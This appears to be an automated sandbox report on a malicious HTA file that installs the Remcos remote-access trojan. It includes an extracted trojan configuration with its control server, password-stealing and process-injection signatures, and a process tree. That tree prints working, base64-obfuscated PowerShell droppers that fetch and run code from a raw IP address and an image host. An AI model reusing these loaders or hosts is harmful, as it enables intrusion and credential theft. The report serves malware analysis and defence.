Analysis
-
max time kernel
150s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-01-2025 08:32
Behavioral task
behavioral1
Sample
shereallyliketokissy9uuoisheismygirlfriendswholovesmetrulygo.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
shereallyliketokissy9uuoisheismygirlfriendswholovesmetrulygo.hta
Resource
win10v2004-20241007-en
General
-
Target
shereallyliketokissy9uuoisheismygirlfriendswholovesmetrulygo.hta
-
Size
46KB
-
MD5
05887835a99ba5b4c9af5be59cbd3666
-
SHA1
c3354d324fd9abe310cb080d80ddd55b02785f92
-
SHA256
cc7d77d7eaf78658e21a950213d1a21c9bc45b1ba279400cbd984468ee721d20
-
SHA512
51af02d7eefdee5fa6e7d327575f137efa1af38037875c2141c37156b2bc10afabbdcd15cb0fd436ddce6d6ae55b896ff03702a3ca774fc8988f99a888af48da
-
SSDEEP
96:IQtaPnLI1mIAvBIAhYcJfw3KwZYxxUunyklIAZBIA35xmIIASGjz:tta/MnAGAFwZYEAMAYASGjz
Malware Config
Extracted
remcos
RemoteHost
hugobross.duckdns.org:1243
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-TA8VXN
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/1508-102-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/720-100-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/2588-99-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/720-100-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/2588-99-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 3 IoCs
flow pid Process 14 3888 powershell.exe 17 4212 powershell.exe 18 4212 powershell.exe -
Evasion via Device Credential Deployment 1 IoCs
pid Process 3888 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts CasPol.exe -
pid Process 4212 powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 4212 set thread context of 4656 4212 powershell.exe 93 PID 4656 set thread context of 2588 4656 CasPol.exe 102 PID 4656 set thread context of 720 4656 CasPol.exe 104 PID 4656 set thread context of 1508 4656 CasPol.exe 105 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 3888 powershell.exe 3888 powershell.exe 4212 powershell.exe 4212 powershell.exe 4212 powershell.exe 4212 powershell.exe 2588 CasPol.exe 2588 CasPol.exe 1508 CasPol.exe 1508 CasPol.exe 2588 CasPol.exe 2588 CasPol.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
pid Process 4656 CasPol.exe 4656 CasPol.exe 4656 CasPol.exe 4656 CasPol.exe 4656 CasPol.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3888 powershell.exe Token: SeDebugPrivilege 4212 powershell.exe Token: SeDebugPrivilege 1508 CasPol.exe -
Suspicious use of WriteProcessMemory 49 IoCs
description pid Process procid_target PID 4852 wrote to memory of 2892 4852 mshta.exe 82 PID 4852 wrote to memory of 2892 4852 mshta.exe 82 PID 4852 wrote to memory of 2892 4852 mshta.exe 82 PID 2892 wrote to memory of 3888 2892 cmd.exe 84 PID 2892 wrote to memory of 3888 2892 cmd.exe 84 PID 2892 wrote to memory of 3888 2892 cmd.exe 84 PID 3888 wrote to memory of 3668 3888 powershell.exe 86 PID 3888 wrote to memory of 3668 3888 powershell.exe 86 PID 3888 wrote to memory of 3668 3888 powershell.exe 86 PID 3668 wrote to memory of 1056 3668 csc.exe 87 PID 3668 wrote to memory of 1056 3668 csc.exe 87 PID 3668 wrote to memory of 1056 3668 csc.exe 87 PID 3888 wrote to memory of 4556 3888 powershell.exe 88 PID 3888 wrote to memory of 4556 3888 powershell.exe 88 PID 3888 wrote to memory of 4556 3888 powershell.exe 88 PID 4556 wrote to memory of 4212 4556 WScript.exe 89 PID 4556 wrote to memory of 4212 4556 WScript.exe 89 PID 4556 wrote to memory of 4212 4556 WScript.exe 89 PID 4212 wrote to memory of 1376 4212 powershell.exe 92 PID 4212 wrote to memory of 1376 4212 powershell.exe 92 PID 4212 wrote to memory of 1376 4212 powershell.exe 92 PID 4212 wrote to memory of 4656 4212 powershell.exe 93 PID 4212 wrote to memory of 4656 4212 powershell.exe 93 PID 4212 wrote to memory of 4656 4212 powershell.exe 93 PID 4212 wrote to memory of 4656 4212 powershell.exe 93 PID 4212 wrote to memory of 4656 4212 powershell.exe 93 PID 4212 wrote to memory of 4656 4212 powershell.exe 93 PID 4212 wrote to memory of 4656 4212 powershell.exe 93 PID 4212 wrote to memory of 4656 4212 powershell.exe 93 PID 4212 wrote to memory of 4656 4212 powershell.exe 93 PID 4212 wrote to memory of 4656 4212 powershell.exe 93 PID 4656 wrote to memory of 3304 4656 CasPol.exe 101 PID 4656 wrote to memory of 3304 4656 CasPol.exe 101 PID 4656 wrote to memory of 3304 4656 CasPol.exe 101 PID 4656 wrote to memory of 2588 4656 CasPol.exe 102 PID 4656 wrote to memory of 2588 4656 CasPol.exe 102 PID 4656 wrote to memory of 2588 4656 CasPol.exe 102 PID 4656 wrote to memory of 2588 4656 CasPol.exe 102 PID 4656 wrote to memory of 4364 4656 CasPol.exe 103 PID 4656 wrote to memory of 4364 4656 CasPol.exe 103 PID 4656 wrote to memory of 4364 4656 CasPol.exe 103 PID 4656 wrote to memory of 720 4656 CasPol.exe 104 PID 4656 wrote to memory of 720 4656 CasPol.exe 104 PID 4656 wrote to memory of 720 4656 CasPol.exe 104 PID 4656 wrote to memory of 720 4656 CasPol.exe 104 PID 4656 wrote to memory of 1508 4656 CasPol.exe 105 PID 4656 wrote to memory of 1508 4656 CasPol.exe 105 PID 4656 wrote to memory of 1508 4656 CasPol.exe 105 PID 4656 wrote to memory of 1508 4656 CasPol.exe 105
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\shereallyliketokissy9uuoisheismygirlfriendswholovesmetrulygo.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c PoweRSHEll -eX BYpasS -NoP -w 1 -C DEviCECRedentIALDepLOymenT ; IeX($(IEX('[sYSTem.texT.EnCOding]'+[cHAr]0X3a+[CHAR]0X3A+'utF8.GEtSTRINg([System.coNvErt]'+[ChaR]58+[CHar]0x3A+'fROmbAsE64strinG('+[CHAR]34+'JFh2MGdxeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJkZUZpTkl0aW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVSlEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFnRGd4cnBhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBraW5MYmxLTyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFV3RFdLaixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImhCdWhHUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUVTcGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPeW5CbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYdjBncXo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNTIuMjI4LjIyOS4yMTQvMzAxL2NyZWFtaXNzaW5nZmFsb3ZlcnZlcnluaWNld2l0aGVudGlyZWl0aW1lZ3RvZ2V0bWVsc2VlLmdJRiIsIiRlTnY6QVBQREFUQVxjcmVhbW1pc3Npbmd0aGViZXN0dGhpbmNyZWFtbWlzc2luZ3RoZWJlcy52YnMiLDAsMCk7U3RhcnQtU2xFZVAoMyk7aU52b0tlLUVYcHJFU1Npb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxjcmVhbW1pc3Npbmd0aGViZXN0dGhpbmNyZWFtbWlzc2luZ3RoZWJlcy52YnMi'+[CHar]34+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoweRSHEll -eX BYpasS -NoP -w 1 -C DEviCECRedentIALDepLOymenT ; IeX($(IEX('[sYSTem.texT.EnCOding]'+[cHAr]0X3a+[CHAR]0X3A+'utF8.GEtSTRINg([System.coNvErt]'+[ChaR]58+[CHar]0x3A+'fROmbAsE64strinG('+[CHAR]34+'JFh2MGdxeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJkZUZpTkl0aW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVSlEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFnRGd4cnBhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBraW5MYmxLTyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFV3RFdLaixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImhCdWhHUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUVTcGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPeW5CbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYdjBncXo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNTIuMjI4LjIyOS4yMTQvMzAxL2NyZWFtaXNzaW5nZmFsb3ZlcnZlcnluaWNld2l0aGVudGlyZWl0aW1lZ3RvZ2V0bWVsc2VlLmdJRiIsIiRlTnY6QVBQREFUQVxjcmVhbW1pc3Npbmd0aGViZXN0dGhpbmNyZWFtbWlzc2luZ3RoZWJlcy52YnMiLDAsMCk7U3RhcnQtU2xFZVAoMyk7aU52b0tlLUVYcHJFU1Npb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxjcmVhbW1pc3Npbmd0aGViZXN0dGhpbmNyZWFtbWlzc2luZ3RoZWJlcy52YnMi'+[CHar]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s5nq4f4o\s5nq4f4o.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB9DA.tmp" "c:\Users\Admin\AppData\Local\Temp\s5nq4f4o\CSC3C190D5FF89492C87DC5F266C62CCD9.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:1056
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\creammissingthebestthincreammissingthebes.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AcwBnAG4AaQBoAHQAdABzAGUAYgBlAGgAdABnAG4AaQBzAHMAaQBtAG0AYQBlAHIAYwAvADEAMAAzAC8ANAAxADIALgA5ADIAMgAuADgAMgAyAC4AMgA1ADEALwAvADoAcAB0AHQAaAAnADsAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAgAD0AIAAkAG8AcgBpAGcAaQBuAGEAbABUAGUAeAB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAG0AdwBuAG0AZQBtAGMAbQAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwA3ADkAOAA4ADcANwA4AC8AcAA5AGUAYQB3AGQAYgBvAHUAMABrAHUAawBrAGkAaAB0AHIAOAByAC4AagBwAGcAJwA7ACQAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIAAkAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGkAbQBhAGcAZQBVAHIAbAApADsAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGUAbgBkAEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACkAOwAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJAB0AHkAcABlACAAPQAgAFsAQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkAMQAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBtAGEAaQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAcgBlAHMAdABvAHIAZQBkAFQAZQB4AHQALAAnAGYAYQBsAHMAZQAnACwAJwBDAGEAcwBQAG8AbAAnACwAJwBmAGEAbABzAGUAJwApACkA')) | Invoke-Expression"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4212 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵PID:1376
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\vattcghhllxmxieiukoubwoypmdvytsb"7⤵PID:3304
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\vattcghhllxmxieiukoubwoypmdvytsb"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2588
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\gcze"7⤵PID:4364
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\gcze"7⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:720
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\qxewvrdc"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1508
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
19KB
MD581aa4efa30fc4255d9c417b3a95fc1f5
SHA16c13cf64a3c07bbb8e33e37d5b88bb254d94403c
SHA25648da31785197553f3ddadd9f99398c3faab59d41685b89127e76bafe4fb0e5d0
SHA5129c508018391f90cac52689c724ded99c071517fde8f734955d9220ce95d06878d842944868f44c4e85659d1cceb5f2d2a37719d2ea663c012e1abdc6aaba19b2
-
Filesize
1KB
MD55f18d18a072ec3828f810054c0c5fa6d
SHA17c1ba52b92b265cfe775e2efdfaf672450470ff1
SHA256acc1b9b8afb9dd728484533da91664b1ae7de924ea2b6b51771eca3e6bc21b92
SHA51289436086b0d72eebb9daa961a8e36ac1f26efa69fe13670e7565dd67c9535e91ce69b9c4c7f072aed2ee7e4e4a51054eb69948b9a7d0b343dbd2a1f9b6d85116
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5b6d645ed8e2dcf566fcf712e83d713a9
SHA12d7c73ec3a19dd7bc37a0c7e9e2422a9f808586b
SHA256384736e137ac4a173bb1f89b1a25c0e483eb330f91c25e13a91f560858788f17
SHA512349db0446b9c2672cef6d1c98fb903b91a400cbd0bc6310297502026ef5a248233aa2709d169bdc5dd5775db3917a6c674aa8a2f8d3de53c1735e50b0e5eaf81
-
Filesize
4KB
MD5c3c5f2de99b7486f697634681e21bab0
SHA100f90d495c0b2b63fde6532e033fdd2ade25633d
SHA25676296dc29f718988107d35d0e0b835c2bf3fc7405e79e5121aa4738f82b51582
SHA5127c60ffdc093de30e793d20768877f2f586bee3e948767871f9a1139252d5d2f593ba6f88ce0ed5f72c79faddb26186792df0581e4b6c84d405c44d9d12f951b8
-
Filesize
221KB
MD5341da1d84b2b18f5396d6920493180c1
SHA1e53a670bd080ca4df1baf560ac85d2d2cf18d082
SHA256e8518dc67c12129696b59cc127d2a066accb411452e6ca19f1507d9b8ce555d3
SHA512f6f2c6353e7c0b51bfc0b80d1dfed3440b2f627dc2bb269f8ea73fca972910e757d08188758c3d10ab1e00a4f570b683c39c1e99e6f8abb265d9141f324b0c52
-
Filesize
652B
MD58e6cefa6354523d6ad64835ef0d0e2ee
SHA15a3b886ef5a9ffe685f95cb8ce45b7e145188073
SHA256979dd93bfb179d401a09f10f6537cfefea623f40bebbe5233b795bdfe48514dc
SHA512283c074eb88213d61e36c34435341c46973940126d47906ecb3ff7a0f4cf69279a3df78ec160c87e67e4c3ee88a19d4a10f095c17be17577e4f50c43e8c5b9ac
-
Filesize
481B
MD5f86ec8ebcf7dbba7c72c1ed4016ca07d
SHA16153ce1dbd28385ecd126a0e9ae4aea6a7e4d7bd
SHA256dec30d002908c68e9db76d807bc2949e32b1d6d6519f864365562f24e2a94458
SHA51253168e89cb4a5764b99c2f3bc189849c7cce45a1c8d32b98801f1a51d92d2893518a7d04b80a8b1cf03c1a109949e7ac9879f12cb98c6ac512e7376bf504f00c
-
Filesize
369B
MD5a6a210d3c23b9966bbbccef17f9ad4fb
SHA14d346d5eee9429319c4a408c00c82c1cc7535ec6
SHA256f56a3be96ac3a34e2392aaf18f5fdfd6d352786cd31003d3b77e2fb13ff47b54
SHA51217733d99b88b9c23112d80f2db21b56aef769a4025ee2f4d6c6ca274269e8c6258913e4a7170b03a9847e0749b13594ec24fcff090251f6584dda99ddae3b542